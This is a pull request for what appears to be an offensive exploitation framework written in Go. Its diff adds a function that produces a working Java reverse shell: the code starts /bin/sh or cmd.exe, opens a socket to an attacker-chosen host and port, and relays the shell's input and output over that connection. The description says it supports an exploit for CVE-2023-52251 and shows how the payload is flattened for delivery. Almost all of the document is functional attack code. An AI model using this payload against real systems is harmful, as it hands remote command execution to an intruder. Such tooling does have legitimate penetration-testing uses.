### PR TITLE
Added a Classic Java Reverse Shell

### DIFF
--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -174,3 +174,30 @@ func UnflattenedSecureReversePython27(lhost string, lport int) string {
 		"        sslsock.send(proc.stdout.read() + proc.stderr.read())\n"+
 		"sslsock.close()\n", lhost, lport)
 }
+
+// An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out
+// the shell using ProcessBuilder and then redirects input/output to/from the sockets.
+func UnflattenedClassicJava(lhost string, lport int) string {
+	return fmt.Sprintf(`String shell = "/bin/sh";
+if (System.getProperty("os.name").indexOf("Windows") != -1) {
+	shell = "cmd.exe";
+};
+Process p = new ProcessBuilder(shell).redirectErrorStream(true).start();
+Socket s = new Socket("%s", %d);
+InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+while (!s.isClosed()) {
+	while (pi.available() > 0) so.write(pi.read());
+	while (pe.available() > 0) so.write(pe.read());
+	while (si.available() > 0) po.write(si.read());
+	so.flush();
+	po.flush();
+	Thread.sleep(50);
+	try {
+		p.exitValue();
+		break;
+	} catch (Exception e) {}
+};
+p.destroy();
+s.close();`, lhost, lport)
+}


### PR DESCRIPTION
To support CVE-2023-52251. The reverse shell is unflattened here, but 

```go
output.PrintStatus("Attempting to trigger reverse shell")
payload := payload.UnflattenedClassicJava(conf.Lhost, conf.Lport)

// this payload needs to be flattened
payload = strings.ReplaceAll(payload, "\n", "")
payload = strings.ReplaceAll(payload, "\t", "")
```

Works fine